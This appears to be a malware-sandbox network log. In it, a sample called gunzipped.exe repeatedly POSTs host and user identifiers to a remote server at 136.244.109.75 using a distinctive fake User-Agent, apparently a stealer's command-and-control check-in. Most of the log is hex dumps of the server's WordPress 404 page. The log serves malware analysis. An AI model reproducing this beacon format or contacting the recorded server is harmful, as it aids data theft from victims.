Apr 17, 2024 03:17:48.414146900 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:48.414185047 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:48.414222956 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:48.414273977 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:48.414314032 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49750	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:48.803719044 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:49.012465000 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:49.947792053 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:48 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:49.947850943 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:49.947889090 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:49.947926998 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:49.947971106 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:49.948009968 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:49.948054075 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:49.948092937 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:49.948159933 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:49.948204041 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49751	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:50.302448988 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:50.510911942 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:51.438206911 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:50 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:51.438271999 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:51.438308001 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:51.438344955 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:51.438384056 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:51.438422918 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:51.438462019 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:51.438499928 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:51.438540936 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
